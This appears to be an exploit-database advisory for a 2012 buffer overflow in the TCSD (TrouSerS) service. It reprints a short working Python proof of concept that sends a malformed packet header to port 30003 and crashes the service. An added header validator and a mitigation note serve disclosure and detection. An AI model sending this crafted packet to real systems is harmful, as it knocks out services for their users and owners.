Vendor: TCSD Service
By: Andy Lutomirski
CVSS: 7.8 (HIGH)
CWE-119: Buffer Overflow
Product Name: TCSD Service
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2012

crash_tcsd.py

This proof-of-concept triggers a buffer overflow in the LoadKeyByBlob handler of the TCSD service. It sends a single crafted 28-byte packet header whose type_offset field (0x80000000) points far outside the packet, and the service crashes while processing that invalid offset.
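The defect the PoC probes is an offset/size pair that is never checked against the packet it belongs to. The following validator is an added example written for this page, not code from the PoC author or from the TCSD/TrouSerS project: it unpacks the 28-byte header using the field names from the PoC's own comments, and rejects any type or parm region that does not lie inside the packet body. The rule that data regions must start after the header and end within packet_size is an assumption about the wire layout, not something the page or the project documents.

```python
# Added example: a self-contained validator for the 28-byte tcsd packet header.
# Field names come from the PoC's comments; the bounds rules and the
# "data follows the header" layout are assumptions, not TrouSerS's own code.
import struct

HDR_FMT = '>IIIIIII'                 # seven big-endian uint32 fields
HDR_LEN = struct.calcsize(HDR_FMT)   # 28 bytes
FIELDS = ('packet_size', 'ordinal', 'num_parms',
          'type_size', 'type_offset', 'parm_size', 'parm_offset')


def parse_header(data):
    """Unpack the fixed header into a dict; raises ValueError if data is too short."""
    if len(data) < HDR_LEN:
        raise ValueError('packet shorter than header (%d < %d)' % (len(data), HDR_LEN))
    return dict(zip(FIELDS, struct.unpack(HDR_FMT, data[:HDR_LEN])))


def check_header(data):
    """Return a list of consistency problems; an empty list means the header is sane.

    Every offset/size pair must describe a region inside the packet body
    (after the header, before packet_size). Python integers never wrap, so
    offset + size cannot overflow here; a C parser has to guard that sum
    explicitly, which is exactly what a 0x80000000 type_offset tests.
    """
    try:
        hdr = parse_header(data)
    except ValueError as exc:
        return [str(exc)]
    problems = []
    size = hdr['packet_size']
    if size < HDR_LEN:
        problems.append('packet_size %d smaller than header' % size)
    if size > len(data):
        problems.append('packet_size %d exceeds bytes received (%d)' % (size, len(data)))
    for region in ('type', 'parm'):
        off, ln = hdr[region + '_offset'], hdr[region + '_size']
        if off < HDR_LEN or off + ln > size:
            problems.append('%s_offset=0x%x size=%d outside packet body [%d, %d)'
                            % (region, off, ln, HDR_LEN, size))
    return problems


# Constructed samples (not captured traffic).
# 1) A well-formed header: 4 bytes of type data at 28, 4 bytes of parm data at 32.
GOOD = struct.pack(HDR_FMT, 36, 11, 1, 4, 28, 4, 32) + b'\x00' * 8
# 2) The same field values as the crash_tcsd.py PoC: type_offset far beyond packet_size.
BAD = struct.pack(HDR_FMT, 28, 11, 1, 0, 0x80000000, 0, 28)

if __name__ == '__main__':
    for name, pkt in (('good', GOOD), ('bad', BAD)):
        print(name, check_header(pkt) or 'ok')
```

Run against a capture of traffic to port 30003, a non-empty result from check_header is a usable detection signal for this bug class; the same bounds test, written with overflow-safe arithmetic, is the check the service-side parser needs before it touches either region.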

Mitigation:

Disable the TCSD service or upgrade to a version that is not vulnerable.

Exploit-DB raw data:

# crash_tcsd.py
# Copyright (c) 2012 Andy Lutomirski.  All rights reserved.
#
# Permission is granted to anyone to copy and redistribute this file verbatim.
# Permission is *not* granted to distribute modified copies or derivative works.

import struct
import socket
import time

# UnloadBlob_PCR_EVENT also appears buggy.

crasher = struct.pack('>IIIIIII',
                      28, # packet_size = sizeof(tcsd_packet_hdr)
                      11, # ordinal: LoadKeyByBlob
                      1, # num_parms = 1 (so first getData doesn't bail)
                      0, # type_size = 0
                      0x80000000, # type_offset is off in lala land
                      0, # parm_size = 0 (skip checking)
                      28, # parm_offset: see getTCSDPacket
                      )

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
s.connect(('127.0.0.1', 30003))
s.send(crasher)
s.shutdown(socket.SHUT_WR)
s.close()